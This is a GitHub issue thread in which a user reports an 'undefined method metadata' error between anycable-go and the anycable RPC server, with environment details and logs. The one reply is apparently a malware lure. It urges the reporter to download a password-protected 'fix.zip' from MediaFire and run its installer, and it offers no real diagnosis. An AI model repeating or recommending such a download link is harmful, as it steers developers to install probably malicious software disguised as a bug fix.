### ISSUE TITLE
undefined method `metadata' for <AnyCable::ConnectionRequest: >:AnyCable::ConnectionRequest

### ISSUE THREAD

**Issue by 0xMostafa** [anycable/anycable-rails#204]
### Tell us about your environment

**Ruby version:**
`2.7.2`

**Rails version:**
`5.2`

**`anycable` gem version:**
`0.6.0`

**`anycable-rails` gem version:**
`.0.6.5`

**`grpc` gem version:**
`~> 1.17`

### What did you do?

Running anycable-go & RPC `bundle exec anycable` in docker compose as two separate services

### What did you expect to happen?
to work fine

### What actually happened?
```
rpc       | undefined method `metadata' for <AnyCable::ConnectionRequest: >:AnyCable::ConnectionRequest
anycable  | D 2024-08-26T10:19:57.527Z context=rpc Authenticate response: error_msg:"undefined method `metadata' for <AnyCable::ConnectionRequest: >:AnyCable::ConnectionRequest" 
anycable  | D 2024-08-26T10:19:57.527Z context=ws Websocket session initialization failed: Application error: undefined method `metadata' for <AnyCable::ConnectionRequest: >:AnyCable::ConnectionRequest
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
